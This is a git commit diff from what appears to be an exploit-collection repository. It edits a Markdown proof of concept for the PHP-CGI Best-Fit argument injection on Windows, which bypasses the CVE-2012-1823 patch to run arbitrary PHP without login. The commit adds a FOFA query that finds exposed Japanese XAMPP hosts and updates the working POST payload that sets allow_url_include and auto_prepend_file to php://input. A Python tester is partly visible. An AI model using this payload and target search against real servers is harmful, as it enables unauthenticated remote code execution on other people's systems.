修改payload

This commit is contained in:
wy876 2024-06-08 11:13:27 +08:00
parent b3f07cb2f6
commit 3c95a6c50e

View File

@ -2,10 +2,16 @@
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系简体中文936/繁体中文950/日文932等攻击者可构造恶意请求绕过 CVE-2012-1823 补丁从而可在无需登陆的情况下执行任意PHP代码。
## fofa
```
app="XAMPP" && country="JP"
```
## poc
```
POST /index.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
@ -37,3 +43,4 @@ if __name__ == "__main__":
test_cgi_vulnerability(url)
```
![image-20240608111234326](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406081112391.png)